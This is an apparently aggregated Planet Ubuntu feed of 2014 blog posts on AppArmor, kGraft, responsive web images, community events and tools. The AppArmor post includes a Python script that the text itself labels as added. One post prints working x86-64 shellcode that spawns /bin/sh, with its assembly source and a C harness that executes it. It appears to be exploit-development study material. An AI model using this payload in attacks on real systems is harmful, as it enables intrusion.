
Jamie Strandboge: Application isolation with AppArmor – part IV

Planet Ubuntu - Fri, 2014-06-06 20:20

Last time I discussed AppArmor, I talked about new features in Ubuntu 13.10 and a bit about ApplicationConfinement for Ubuntu Touch. With the release of Ubuntu 14.04 LTS, several improvements were made:

  • Mediation of signals
  • Mediation of ptrace
  • Various policy updates for 14.04, including new tunables, better support for XDG user directories, and Unity7 abstractions
  • Parser policy compilation performance improvements
  • Google Summer of Code (SUSE sponsored) python rewrite of the userspace tools

Signal and ptrace mediation

Prior to Ubuntu 14.04 LTS, a confined process could send signals to other processes (subject to DAC) and ptrace other processes (subject to DAC and YAMA). AppArmor on 14.04 LTS adds mediation of both signals and ptrace which brings important security improvements for all AppArmor confined applications, such as those in the Ubuntu AppStore and qemu/kvm machines as managed by libvirt and OpenStack.

When developing policy for signal and ptrace rules, it is important to remember that AppArmor performs a cross check: it verifies both that

  • the process sending the signal/performing the ptrace is allowed to send the signal to/ptrace the target process
  • the target process receiving the signal/being ptraced is allowed to receive the signal from/be ptraced by the sender process

Signal(7) permissions use the ‘signal’ rule with the ‘receive/send’ permissions governing signals. PTrace permissions use the ‘ptrace’ rule with the ‘trace/tracedby’ permissions governing ptrace(2) and the ‘read/readby’ permissions governing certain proc(5) filesystem accesses, kcmp(2), futexes (get_robust_list(2)) and perf trace events.

Consider the following denial:

Jun 6 21:39:09 localhost kernel: [221158.831933] type=1400 audit(1402083549.185:782): apparmor="DENIED" operation="ptrace" profile="foo" pid=29142 comm="cat" requested_mask="read" denied_mask="read" peer="unconfined"

This demonstrates that the ‘cat’ binary running under the ‘foo’ profile was unable to read the contents of a /proc entry (in my test, /proc/11300/environ). To allow this process to read /proc entries for unconfined processes, the following rule can be used:

ptrace (read) peer=unconfined,

If the receiving process was confined, the log entry would say 'peer="<profile name>"' and you would adjust the 'peer=unconfined' in the rule to match the profile name in the log denial. In this case, because unconfined processes implicitly allow themselves to be read ('readby') by all other processes, we don't need to specify the cross check rule. If the target process was confined, the profile for the target process would need a rule like this:

ptrace (readby) peer=foo,

Likewise for signal rules, consider this denial:

Jun 6 21:53:15 localhost kernel: [222005.216619] type=1400 audit(1402084395.937:897): apparmor="DENIED" operation="signal" profile="foo" pid=29069 comm="bash" requested_mask="send" denied_mask="send" signal=term peer="unconfined"

This shows that 'bash' running under the 'foo' profile tried to send the 'term' signal to an unconfined process (in my test, I used 'kill 11300') and was blocked. Signal rules use 'receive' and 'send' to determine access, so we can add a rule like so to allow sending of the signal:

signal (send) set=("term") peer=unconfined,

Like with ptrace, a cross-check is performed with signal rules but implicit rules allow unconfined processes to send and receive signals. If pid 11300 were confined, you would adjust the ‘peer=’ in the rule of the foo profile to match the denial in the log, and then adjust the target profile to have something like:

signal (receive) set=("term") peer=foo,
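To make the cross check concrete, here is an added Python script (not part of the post) that turns the DENIED lines above into the rule for the profile that logged the denial and, when the peer is itself confined, the matching readby/tracedby/receive rule for the peer's profile. The first two sample lines are the denials quoted above; the third, with peer="bar", is constructed.

```python
import re

# Constructed sample audit lines. The first two are the denials discussed
# above; the third is a constructed variant in which the target process is
# itself confined (profile "bar"), so a cross-check rule is also needed.
SAMPLE_DENIALS = [
    'Jun 6 21:39:09 localhost kernel: [221158.831933] type=1400 '
    'audit(1402083549.185:782): apparmor="DENIED" operation="ptrace" '
    'profile="foo" pid=29142 comm="cat" requested_mask="read" '
    'denied_mask="read" peer="unconfined"',
    'Jun 6 21:53:15 localhost kernel: [222005.216619] type=1400 '
    'audit(1402084395.937:897): apparmor="DENIED" operation="signal" '
    'profile="foo" pid=29069 comm="bash" requested_mask="send" '
    'denied_mask="send" signal=term peer="unconfined"',
    'Jun 6 22:01:00 localhost kernel: [222400.000000] type=1400 '
    'audit(1402084860.000:901): apparmor="DENIED" operation="signal" '
    'profile="foo" pid=29100 comm="bash" requested_mask="send" '
    'denied_mask="send" signal=kill peer="bar"',
]

# Sender-side permission -> permission the target profile needs so that the
# cross check also passes. Unconfined targets implicitly allow all of these.
CROSS_CHECK = {
    "ptrace": {"read": "readby", "trace": "tracedby"},
    "signal": {"send": "receive"},
}

# key=value pairs; the value is either double-quoted or a bare token
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_audit_fields(line):
    """Return the key=value fields of one AppArmor audit line as a dict."""
    return {key: quoted or bare for key, quoted, bare in FIELD_RE.findall(line)}


def rules_for_denial(line):
    """Translate one DENIED line into (profile, rule) pairs that would allow it.

    The first pair goes into the profile that logged the denial. A second
    pair, the cross-check rule for the target's profile, is emitted only when
    the target is confined; a denial logged on the receiving side already
    names the receive/readby permission and needs no second rule.
    """
    fields = parse_audit_fields(line)
    op = fields.get("operation")
    if fields.get("apparmor") != "DENIED" or op not in CROSS_CHECK:
        return []
    profile, peer = fields["profile"], fields["peer"]
    perms = fields["denied_mask"].replace(",", " ").split()
    # signal denials carry the signal name, which becomes a set=() qualifier
    sig = f' set=("{fields["signal"]}")' if op == "signal" and "signal" in fields else ""
    rules = [(profile, f"{op} ({', '.join(perms)}){sig} peer={peer},")]
    if peer != "unconfined":
        cross = [CROSS_CHECK[op][p] for p in perms if p in CROSS_CHECK[op]]
        if cross:
            rules.append((peer, f"{op} ({', '.join(cross)}){sig} peer={profile},"))
    return rules


if __name__ == "__main__":
    for line in SAMPLE_DENIALS:
        for profile, rule in rules_for_denial(line):
            print(f"profile {profile}: {rule}")
```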

Signal and ptrace rules are very flexible and the AppArmor base abstraction in Ubuntu 14.04 LTS has several rules to help make profiling and transitioning to the new mediation easier:

# Allow other processes to read our /proc entries, futexes, perf tracing and
# kcmp for now
ptrace (readby),
 
# Allow other processes to trace us by default (they will need
# 'trace' in the first place). Administrators can override
# with:
# deny ptrace (tracedby) ...
ptrace (tracedby),
 
# Allow unconfined processes to send us signals by default
signal (receive) peer=unconfined,
 
# Allow us to signal ourselves
signal peer=@{profile_name},
 
# Checking for PID existence is quite common so add it by default for now
signal (receive, send) set=("exists"),

Note the above uses the new ‘@{profile_name}’ AppArmor variable, which is particularly handy with ptrace and signal rules. See man 5 apparmor.d for more details and examples.

14.10

Work still remains and some of the things we’d like to do for 14.10 include:

  • Finishing mediation for non-networking forms of IPC (e.g., abstract sockets). This will be done in time for the phone release.
  • Have services integrate with AppArmor and the upcoming trust-store to become trusted helpers (also for the phone release)
  • Continue work on networking IPC (for 15.04)
  • Continue to work with the upstream kernel on kdbus
  • Work continues on LXC stacking, and we hope to have stacked profiles within the current namespace for 14.10. Full support for stacked profiles, where the host and the container apply different policy to the same binary at the same time, should be ready by 15.04
  • Various fixes to the python userspace tools for remaining bugs. These will also be backported to 14.04 LTS

Until next time, enjoy!



Chris J Arges: using kgraft with ubuntu

Planet Ubuntu - Fri, 2014-06-06 18:50
New live kernel patching projects have hit LKML recently [1][2], and I've taken the opportunity to test drive kGraft with the Ubuntu kernel. This post documents how to get a sample patch working.

A Simple Example

First, I had to take the patches from [3] and apply them against the ubuntu-utopic kernel, which is based on 3.15-rc8 as of this post. They cherry-picked cleanly and the branch I'm using is stored here [4]. In addition to applying the patches I had to also enable CONFIG_KGRAFT. A pre-built test kernel can be downloaded here [5].

Next, I created a test VM and installed the test kernel, headers, and build dependencies into that VM and rebooted. Now after a successful reboot, we need to produce an actual patch to test. I've created a github project [6] with the sample patch; to make it easy to clone and get started.

sudo apt-get install git build-essential
git clone https://github.com/arges/kgraft-examples.git
cd kgraft-examples
make

The code in kgraft_patcher.c is the example found in samples/kgraft [7]. Now we can build it easily using the Makefile I have in my project by typing make.

Next, the module needs to be inserted using the following:

sudo insmod ./kgraft_patcher.ko

Run the following to see if the module loaded properly:

lsmod | grep kgraft

You'll notice some messages printed with the following:

[ 211.762563] kgraft_patcher: module verification failed: signature and/or required key missing - tainting kernel
[ 216.800080] kgr failed after timeout (30), still in degraded mode
[ 246.880146] kgr failed after timeout (30), still in degraded mode
[ 276.960211] kgr failed after timeout (30), still in degraded mode

This means that not all processes have entered the kernel and so may not have the "new universe" flag set. Run the following to see which processes still need to be updated:

cat /proc/*/kgr_in_progress

Sometimes a process has to be sent a signal to make it enter the kernel, so that all processes complete the transition.

An example of this is found in the kgraft-examples [6] called 'hurryup.sh':

#!/bin/bash
# Walk every numeric /proc entry (one per process) and nudge the ones that
# have not yet switched to the new universe.
for p in $(ls /proc/ | grep '^[0-9]'); do
    if [[ -e /proc/$p/kgr_in_progress ]]; then
        # kgr_in_progress is 1 while the process still blocks the transition
        if [[ `sudo cat /proc/$p/kgr_in_progress` -eq 1 ]]; then
            echo $p;
            sudo kill -SIGCONT $p
        fi
    fi
done

This checks all processes that have 'kgr_in_progress' set and sends a SIGCONT signal to each of them.
I've noticed that I had to also send a SIGSTOP followed by a SIGCONT to finally get everything synced up.
Eventually you'll see:

[ 1600.480233] kgr succeeded

Now your kernel is running the new patch without rebooting!

References
  1. https://lkml.org/lkml/2014/4/30/477
  2. https://lkml.org/lkml/2014/5/1/273
  3. https://git.kernel.org/cgit/linux/kernel/git/jirislaby/kgraft.git/
  4. http://zinc.ubuntu.com/git?p=arges/ubuntu-utopic.git;a=shortlog;h=refs/heads/kgraft-utopic
  5. http://people.canonical.com/~arges/kgraft-utopic/
  6. https://github.com/arges/kgraft-examples
  7. https://git.kernel.org/cgit/linux/kernel/git/jirislaby/kgraft.git/tree/samples/kgraft/kgraft_patcher.c?h=kgraft
  8. https://git.kernel.org/cgit/linux/kernel/git/jirislaby/kgraft.git/tree/tools/kgraft/create-stub.sh?h=kgraft

Rhonda D'Vine: No Portland

Planet Ubuntu - Fri, 2014-06-06 12:55

This year's debconf in portland will happen without me being there. As much as I would love to be at home again, I won't be able to afford it. As much as I'd liked to help to keep portland weird, a discussion led to the feeling that I'm not welcome there and along that lines made me miss the deadline for sponsorship request due to not being very motivated to push for it because of that. And without sponsorship I won't be able to afford it, given that I need to save up for my upcoming move.

This also means I won't be able to host the Poetry Night. I hope that someone will be picking up that ball and continue it. Personally I am more motivated than ever to start writing again, given that there is currently a Bus Bim Slam (Bus Tram Slam) happening over here in Vienna and I try to attend as much stations as possible, and there will be a Diary Slam during this year's FemCamp Vienna.
I'm indifferent on whether the Debconf Poetry Night should be recorded or not. On the one hand it would be great to see people performing, on the other hand it might shy away certain personal poems that one wouldn't want to have out in the wild. Whoever picks it up, think about that part.

I wish everyone luck in Portland, and I'm looking forward to yet another great job by the video team so I can follow a few talks from at home. It sort of breaks my heart to not be able to hug you lot this year, and I wish you a great conference. We'll meet again next year in Heidelberg!


Canonical Design Team: Making ubuntu.com responsive: dealing with responsive images (10)

Planet Ubuntu - Fri, 2014-06-06 09:30

This post is part of the series ‘Making ubuntu.com responsive‘.

Deciding how you’re going to handle responsive images is a big part of most responsive projects — also, one that usually causes many headaches!

We had really interesting discussions within the team to try to find out which options were out there, being used by other people, and whether those solutions could be useful (and possible) for us.

There is a range of solutions and opinions on this matter, but ultimately it’s all down to the content and types of images your website actually has to handle, and the technical and resource limitations of your team.

We tried to keep an open mind as to what would be possible to achieve within a very small timeframe: we wanted to find a solution that would work for our content, that would be achievable within our deadlines, and obviously, that would improve the experience of the visitors to our site.

Making an image inventory

Before discussing any potential solutions, it’s important to understand exactly what type of images are used on your site, how they are created, who creates them, how they are added to the site and in which locations, how the images play with the content and whether there are different levels of importance (UI icons, purely decorative images, infographics, editorial images, etc.).

You might realise you only use UI icons and vector illustrations, or that all your images are decorative and secondary, or even that all your images are photos commissioned to professional photographers and photojournalists that add great value to your content and designs. It’s only after doing this inventory that you’ll have sufficient information to decide what to do next and what your site needs.

On ubuntu.com there are five different types of image assets:

  • Pictograms: from an existing set of pre-approved pictograms, created in various formats, in a small subset of colours
  • Illustrations: usually created using two or more pictograms, or in a similar style, in vector format
  • Photography: these can be product shots of devices, screengrabs of our operating system and applications, and sometimes other types of photographic images
  • Logos: not only Ubuntu and Canonical’s own logos, but several partner logos
  • Backgrounds: these can be anything from dot patterns to textured backgrounds

Pictograms, illustrations, photography, logos and backgrounds are part of the image arsenal of ubuntu.com.

The pictograms and illustrations are always created in vector format and can easily be exported to an SVG. Similarly, many of the logos we use on the site can be sourced in an SVG format, but many times this isn’t possible. The photography and backgrounds used on the site, however, are usually provided to us in bitmap format, that lose definition when scaled up.

With this inventory in mind, we knew we’d have to come up with different solutions for the different types of assets rather than a single solution for all images.

Scalable vectors: pictograms, illustrations and logos

We investigated the possibility of creating a font for our icons and even started this process, but quickly decided that the lack of consistent browser support wasn’t acceptable.

The decision to move from GIF and PNG icons to SVG was relatively straightforward for us, as all our icons and pictograms are created in vector format from the outset. This would allow us to have crisp, scalable icons in most browsers, whether the device has a retina screen or not.

It was at this point that we thought it would be a good idea to finally introduce Modernizr into our toolset. With Modernizr we could target browsers that don’t support SVG and serve them with a PNG image replacement.

We did run into some browser support issues, mainly with Opera Mini which doesn’t support background-size (necessary if you’re scaling the same image asset instead of creating copies at different sizes) but does support SVG. To solve this problem, Ant wrote a JavaScript snippet that detects Opera Mini and adds the class .opera-mini to the body of the document. He will be covering this in more detail in a following post in this series.

Opera Mini’s SVG rendering issues.

We have explored the possibility of dynamically changing the colours of our SVG pictograms, but haven’t yet found a solution that is compatible across browsers — we’re open to suggestions!

Bitmap formats: photography and backgrounds

This is where things usually get trickier: how do you create a balance between serving users the best quality image they can get and saving their bandwidth?

Ideally, we’d have had the time to add the ability of images to be called on the fly in the size needed, so that the user didn’t have to download a size that was not intended for his or her screen size. This is something that we still want to work on, but just couldn’t justify to be added to the scope of this first iteration of the responsive transition.

Eventually we decided to use Imager.js — made by the BBC News developers — for responsive imaging in the markup. We chose this solution as it has simple syntax and is being used in production on high traffic websites, so it was proven to work. It seemed like a simple solution that fit our needs. In simple terms, the script runs through the page, looking up placeholder elements and replacing them with the closest available image size based on the width of the container.

CSS helper classes

We’ve created three CSS classes that can be used to hide/show images and other elements according to the size of the viewport:

  • .for-small: only shows in the smallest media query viewport
  • .for-medium: only shows in the small and medium media query viewports
  • .not-for-small: doesn’t show in the smallest media query viewport

These classes give us enough flexibility to decide which images should be visible based on our breakpoints in cases where we need more control. This means if we change the breakpoints, the classes will inherit the change.

File size

Initially we were planning on creating several versions of the images on the site, for small, medium and large screen sizes, but we found out that some of the current images on the site had a much larger file size than they needed to — for example, some transparent PNGs were being used when transparency was not a requirement.

With the limited time available, we opted for focusing on reducing file sizes as much as possible for existing images as a priority. This way, we’d make our pages smaller but small higher density screens would still see crisp images, since at smaller sizes they’d be reduced to about half their original size.

You can see a comparison of the file size per section of the site before and after this process.

Section       Size before Ubuntu 14.04 LTS release (KB)   Size after Ubuntu 14.04 LTS release (KB)
Homepage      434                                          193
About         1460                                         1787
Cloud         2809                                         2304
Desktop       3794                                         2571
Download      2921                                         3990
Management    991                                          1102
Partners      2243                                         2320
Phone         6943                                         2021
Server        1483                                         636
Support       679                                          480
Tablet        3318                                         1829
TV            603                                          733

We obtained these sizes using a combination of YSlow and PhantomJS.

Some of the sections were expanded for the Ubuntu 14.04 LTS release in April, which justifies some of the increases. The desktop, phone and tablet sections, however — the worst offenders — saw a significant reduction in file size, mainly from switching to the most appropriate file format instead of all PNGs.

Another way to create more consistency and file size savings across the site was the introduction of a pictogram and logo package. Instead of creating pictograms ad-hoc as needed, we now have a defined set of pictograms in a central location that can be reused across the site, in all its different colour variations. Because the pictograms and many of the logos are provided in an SVG format, they can be scaled to the size that is needed.

Ideas for the future

Despite the visible improvements, there are plenty of things we’d still like to explore in the way we handle images in a responsive world.

We are currently working on an asset server that will allow us to dynamically request different sizes and formats of assets (for example, SVG to PNG), which we can offset, crop, etc., right from the src property, also being far more cacheable with long expiry times. It will also make it easier to share assets, as they will be located at a permanent URL and will become findable through a database and metadata, which should encourage reuse.

These were the solutions we came up with that worked best with our timescales and resources. We’d love to hear how you’ve handled images in your responsive projects too, so let us know in the comments!

Reading list

Ubuntu Podcast from the UK LoCo: S07E10 – The One with the Ultimate Fighting Champion

Planet Ubuntu - Fri, 2014-06-06 06:57

We’re back with Season Seven, Episode Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Tony Whitmore, and Laura Cowen are drinking tea and eating very rich chocolate cake (like this one, only more chocolatey) in Studio L.


In this week’s show:

  • We interview Martin Wimpress from the MATE desktop team.
    • If you want to know the memory requirements of the many different desktop environments, see his blog.
    • Also, he is a maintainer of the MATE LiveCD.
  • We also discuss:
    • Beards. Again.
    • Secret projects that can’t be talked about.
    • Getting even closer to sending Tony up a mountain in Malawi.
    • Going on an Ubuntu Sprint to Malta.
    • Moving web and email hosting to Clook, a Northern hosting service.
  • We share some Gooey Lurve from Mark:
    “Undo Closed Tab” in Firefox
  • And we read your feedback – thanks for sending it in!

We’ll be back next week, so please send your comments and suggestions to: podcast@ubuntu-uk.org
Join us on IRC in #uupc on Freenode
Leave a voicemail via phone: +44 (0) 203 298 1600, sip: podcast@sip.ubuntu-uk.org and skype: ubuntuukpodcast
Follow us on Twitter
Find our Facebook Fan Page
Follow us on Google+

Benjamin Kerensa: Speaking at OSCON 2014

Planet Ubuntu - Fri, 2014-06-06 05:52

Mozillians at OSCON 2013

In July, I’m speaking at OSCON. But before that, I have some other events coming up including evangelizing Firefox OS at Open Source Bridge and co-organizing Community Leadership Summit. But back to OSCON; I’m really excited to speak at this event. This will be my second time speaking (I must not suck?) and this time I have a wonderful co-speaker Alex Lakatos who is coming in from Romania.

For me, OSCON is a really special event because very literally it is perhaps the one place you can find a majority of the most brilliant minds in Open Source all at one event. I’m always very ecstatic to listen to some of my favorite speakers such as Paul Fenwick who always seems to capture the audience with his talks.

This year, Alex and I are giving a talk on “Getting Started Contributing to Firefox OS,” a platform that we both wholeheartedly believe in and we think folks who attend OSCON will also be interested in.

#OSCON 2014 presents “Getting Started Contributing to Firefox OS” by @bkerensa of @mozilla http://t.co/f1iumzhg1q

— O’Reilly OSCON (@oscon) May 14, 2014

And last but not least, for the first time in some years Mozilla will have a booth at OSCON and we will be doing demos of the newest Firefox OS handsets and tablets and talking on some other topics. Be sure to stop by the booth and to fit our talk into your schedule. If you are arriving in Portland early, then be sure to attend the Community Leadership Summit which occurs the two days before OSCON, and heck, be sure to attend Open Source Bridge while you’re at it.

The Fridge: Renewed call for 12:00 UTC Membership Board Nominees

Planet Ubuntu - Thu, 2014-06-05 18:04

At the end of April we called for nominations to the Membership Board. This board oversees the addition of people to Ubuntu Members, which, needless to say, we (and we would hope you) believe to be an important part of the Ubuntu Community.

Since then the Membership Board has received some nominations; however, up to now all the received nominations are for the 22:00 UTC board.

So… we are in need of people who are able to fulfill this important job specifically for the 12:00 UTC session.

If you fulfill the requirements to be nominated AND can do so at the all-important time slot, please consider either nominating yourself or somebody else (please confirm they wish to accept the nomination and state that you have done so). Send a mail to the membership boards mailing list (ubuntu-membership-boards at lists.ubuntu.com) by Friday, June 20th. You will want to include some information about yourself (or the applicant you are nominating) and a launchpad profile link.

To recap on the requirements for this position

  • be an Ubuntu member (preferably for some time)
  • be confident that you can evaluate contributions to various parts of our community
  • be committed to attending the membership meetings at 12:00UTC
  • broad insight into the Ubuntu community at large is a plus

Additionally, those sitting on membership boards are current Ubuntu Members with a proven track record of activity in the community. They have shown themselves over time to be able to work well with others and display the positive aspects of the Ubuntu Code of Conduct. They should be people who can discern character and evaluate contribution quality without emotion while engaging in an interview/discussion that communicates interest, a welcoming atmosphere, and which is marked by humanity, gentleness, and kindness. Even when they must deny applications, they should do so in such a way that applicants walk away with a sense of hopefulness and a desire to return with a more complete application rather than feeling discouraged or hurt.

Without sufficient people to run the 12:00 UTC session we are in a position where it is possible that we’ll be forced to move to running only one session for Ubuntu Membership. We’d hate to see this happen, but if so, the Community Council will work closely with the Membership Board to make sure we serve the needs of the APAC region, possibly through a modified membership application process for people who are unable to attend the 22:00 UTC session.

Elizabeth K. Joseph, on behalf of the Ubuntu Community Council

Zygmunt Krynicki: Moving to my own email address

Planet Ubuntu - Thu, 2014-06-05 17:02
So I've been using Gmail for a good while. I have three accounts, one personal, one for Canonical personality and one dead for my Linaro personality.

Using Google products with more than one account is a frustrating experience. Especially with hangouts that apparently just don't work at all without private browsing. But that's just a minor annoyance.

The Linaro experience taught me that nothing lasts unless you own it. With that in mind I've decided to move my primary personal address away from @gmail.com to my own domain.

My new address is related to my twitter handle @zygoon (since my usual nickname was not available) on my own domain, zygoon.pl. If, by any chance, you have zkrynicki@gmail.com in your address book I'd like to ask you to update it to:

me@zygoon.pl

I've published updated GPG keys in case you were wondering.

José Antonio Rey: Need help rooting or flashing your Nexus device? The solution is here!

Planet Ubuntu - Thu, 2014-06-05 03:40

A couple days ago, Android 4.4.3 was released. I have a Nexus device, so I was waiting for the OTA update. I had the 4.4.2 update on the queue, though, so I decided to go ahead and apply it. But my recovery partition had the TeamWin Recovery installed, which didn’t like the upgrade. So, I asked a friend of mine and he ended up giving me a simple solution for my flashing and rooting problems: Nexulockr.

Nexulockr is a program written by Ian Santopietro, which makes the task of managing your Nexus device (in terms of the previously mentioned stuff) way too easy. So, I went ahead and downloaded the Android 4.4.3 factory image for my device, and patiently waited. Well, I couldn’t expect to download it quickly with this 400 KB/s connection. While I did, the new Nexulockr version finished uploading, and I was getting ready to add the PPA to my machine. Doing it is as simple as executing the following commands:

sudo add-apt-repository ppa:nexulockr-dev/nexulockr-beta
sudo apt-get update
sudo apt-get install nexulockr

That, after another bit of waiting, installed Nexulockr into my machine. And I was ready to go! I opened the program and this magic screen appeared (with all my device info, of course):

The process of flashing the image was super quick and easy. I just clicked on the right button, and this other window appeared:

In the factory image I downloaded, I got lots of .img files compressed into one gzip. Problem is, sometimes you don’t know what image to flash first or last. Nexulockr solves this problem by having the buttons in the order the images need to be flashed. I went ahead and started flashing the images. No additional efforts were needed on my side, just selecting the image and clicking that automagic button while my phone was connected.

The next day, I found out my root had disappeared (for obvious reasons), so I had to root my phone again. Guess what – Nexulockr also helped me with that. I went ahead, connected my phone, and clicked the “Root” button. I selected “Root device” and I just had to do one press on my phone to confirm the root. And that was it. No tedious command line interaction!

The developer states that Nexulockr may work with some other devices, but this is not guaranteed. Still, for all those of you with Nexus devices, this may come in handy at some point. As I am writing this, a build for the beta package is ongoing. So, why not give it a try after it’s done?


Fumihito YOSHIDA: Ubuntu 14.04 LTS release party + Offline meeting 14.04 Tokyo

Planet Ubuntu - Thu, 2014-06-05 03:11
A few weeks ago, the Ubuntu Japanese Team convened "Ubuntu 14.04 LTS release party + Offline meeting 14.04", co-sponsored by GREE, Inc., with around 100 attendees. The event combined hackathon and seminar sessions, so we had it both ways.

Virtual tour:

1) A lot of sandwiches (for 100 attendees) and party dishes.

Note: These represent just the tip of the iceberg. But they completely disappeared within 20 minutes....:)

2) A lot of Ubuntu 14.04 LTS CDs (from the LoCo kit, thanks Canonical!) with *pretty* stuffed Tahr and Unicorn (owner: Shibata Mitsuya).

3) Terazono Junya with LipoD (Lipovitan D, a popular Japanese energy drink).

4) Large screen (very nice, thanks GREE!)

5) Retrospective by Jun. The Ubuntu Japanese Team has created "Ubuntu Japanese Remix" for a long time (about 8 years); he is a great leader.

6) Seminar by Tokura Aya (Microsoft). She is the evangelist/image character of Microsoft Azure/Cloud in Japan.

7) Seminar by Shiobara Hiroaki (GMO Internet). He escorts "Mikumo-Conoha", the mascot fairy of "ConoHa" (GMO's cloud service).

8) Seminar by Yokota Masatoshi (Sakura Internet). He and Mr. Shiobara started a verbal battle like wrestling entertainment (it's entertainment: they kept their friendliness and respect, but engaged in a heated debate. I know they shook hands after the sessions. :) ).

One of the session themes was "Retrospective", an overview of 10 years of Ubuntu.

- "Ubuntu and Me, a certain Ubuntu user's voice" by Terazono Junya (an individual, but he is a famous planetary informatics scientist, a.k.a. "Hayabusa project's PR expert with LipoD").
- "Retrospective of the last 10 years" by Kobayashi Jun (Ubuntu Japanese Team)

The other seminar sessions focused on "VPS and Cloud production environments with Ubuntu"; the line-up was as follows.

- "Ubuntu + Microsoft Azure, a quick guide before you use Azure" by Tokura Aya, a.k.a. "Cloudia Madobe" (Microsoft Corporation).
- "Ubuntu on Microsoft Azure" by Tsumura Akira (Japan Azure User Group)
- "GMO Cloud with Ubuntu 14.04" by Shiobara Hiroaki (GMO Internet)
- "Using Ubuntu on Sakura's VPS/Cloud" by Yokota Masatoshi (Sakura Internet)
- "Using Juju for your Ubuntu environment" by Matsumoto Takenori (Canonical)

Yes, they are awesome presenters (thanks!); they distribute Ubuntu environments as Cloud/VPS operators. You can use Ubuntu on their VPS/Cloud services with a one-click operation. Excellent!

And you can check another report on gihyo.jp (http://gihyo.jp/admin/serial/01/ubuntu-recipe/0325) by Terauchi Yasuyuki (in Japanese), sponsored by GIHYO.

In closing, I would like to thank you all for the convention. Thanks a lot!

David Tomaschik: Minimal x86-64 shellcode for /bin/sh?

Planet Ubuntu - Thu, 2014-06-05 01:54

I was trying to figure out the minimal shellcode necessary to launch /bin/sh from a 64-bit processor, and the smallest I could come up with is 25 bytes: \x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05.

This was produced from the following source:

BITS 64
main:
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    xor eax, eax
    cdq
    xor esi, esi
    push rsp
    pop rdi
    mov al, 0x3b      ; sys_execve
    syscall

Compile with nasm, examine the output with objdump -M intel -b binary -m i386:x86-64 -D shellcode.

Here's a program for testing:

#include <sys/mman.h>
#include <stdint.h>
#include <stdio.h>

char code[] = "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05";

int main(){
    /* code lives in .data, which is not executable; make its page executable */
    if (mprotect((void *)((uint64_t)code & ~4095), 4096, PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }
    (*(void(*)()) code)();
    return 0;
}

I'd like to find a good tool to compile my shellcode, extract as hex, build a test bin, and run it, all in one. Should be a trivial python script, actually.

Daniel Pocock: Trialing the xTuple/PostBooks next generation web UI

Planet Ubuntu - Wed, 2014-06-04 20:35

For some time I've been using PostBooks to keep track of finances. The traditional PostBooks system has a powerful Qt GUI.

The xTuple team have been hard at work creating a shiny new web-based user interface.

The traditional UI has no dedicated server - all users communicate directly with the PostgreSQL database where stored procedures and triggers ensure the correct logic is applied.

The new model provides an xTuple application server that can handle requests from web users and potentially other third-party apps too.

Who is it for?

Some people may feel that the web UI is intended to appeal to mobile users. While it is useful for mobile and tablet devices, this is not strictly the aim, John has discussed this in a blog.

One benefit of the web UI is that accountants and book-keepers do not need to have a copy of every exact PostBooks version that every client is using. Given that many people only need their accountant to look at their books for just a few hours at the end of each year, the ease of access with a web UI will make a big difference.

Trying it out quickly

The xTuple Git repository provides a script to install the whole server quickly. Initially it supported only a single Ubuntu release; I recently contributed some tweaks to generalize it for Debian wheezy and potentially other releases. It doesn't appear too difficult to generalize it further for Fedora or RHEL users.

To get going, I recommend trying it in a fresh virtual machine, either in a server environment or a desktop VirtualBox solution. The installation script will install various packages on the machine and mess about with the PostgreSQL setup, so you will not want to run the automated setup script on any machine where you have existing databases.

Once the virtual machine is set up, make sure sudo is installed and configured:


# apt-get install sudo
# visudo

and then run the install as your normal user:


git clone --recursive git://github.com/xtuple/xtuple.git
cd xtuple
git remote add XTUPLE git://github.com/xtuple/xtuple.git
git fetch XTUPLE
git checkout `git describe --abbrev=0`
chmod a+x scripts/install_xtuple.sh
scripts/install_xtuple.sh

If all goes well, 5-10 minutes later it is ready to run:


cd node-datasource
node main.js

The port numbers will appear on the screen and you can connect with a web browser.

Trying it out

Despite my comments above to the effect that this is not primarily aimed at mobile, the first and second devices I tested with were both mobile devices, a Samsung Galaxy S3 and a Samsung Galaxy Note 3. I feel the Note is far better for this type of application, primarily due to screen size and the fact that most of the forms in the application have fields that launch popup menus. It appears to work in both Chrome and Firefox on these devices.

One handy feature is that the mobile device can dial numbers directly from the CRM address book; this is done with the tel: URI scheme.

My impression is that this is still a product that is in the final stages of development, although some people will be able to use it almost immediately. One significant thing to note is that the database schema is very stable due to the long history of the traditional xTuple/PostBooks products.

The Fridge: Alternate Meeting Channel

Planet Ubuntu - Wed, 2014-06-04 20:24

Over the past several years the Ubuntu community has grown to encompass projects that range a variety of teams that work on everything from tablets to servers.

We’ve recently been seeing an increase in meeting time collisions among teams, so we’ve decided to go ahead and open an alternate meeting channel called #ubuntu-meeting-2 where teams can host their meetings if a meeting is already happening in #ubuntu-meeting during the time they want to host their own meeting. The Ubuntu Technical Board was the first to have their meeting on the schedule for this new channel!

If your team wants to have their meetings scheduled in our meeting grounds, please let us know by dropping an email to ubuntu-news-team@lists.ubuntu.com or contacting us on IRC at #ubuntu-news on irc.freenode.net.

Aurélien Gâteau: A template for shell-based command-line scripts

Planet Ubuntu - Wed, 2014-06-04 16:54

If you write shell scripts, you may be familiar with the situation where you wrote a script and now would like to extend it with some optional argument. Said script being a temporary hack (as temporary as those tend to be...), you end up writing a quick'n'dirty command-line parser, suffering limitations like fixed argument order or other things which make tools annoying to use, but which would take more time to get right than is worth it for this tiny shell script.

I felt this annoyance many times while writing scripts. To avoid that situation, I used to have a template which made use of the getopt binary but I always found it cumbersome: annoying to work with and hard to read again when coming back to my code after a while. Recently I came up with a simpler, slightly more manual, alternative.

The whole template looks like this:

#!/bin/sh
set -e

PROGNAME=$(basename "$0")

die() {
    echo "$PROGNAME: $*" >&2
    exit 1
}

usage() {
    if [ "$*" != "" ] ; then
        echo "Error: $*"
    fi

    cat << EOF
Usage: $PROGNAME [OPTION ...] [foo] [bar]

<Program description>.

Options:
-h, --help          display this usage message and exit
-d, --delete        delete things
-o, --output [FILE] write output to file
EOF

    exit 1
}

foo=""
bar=""
delete=0
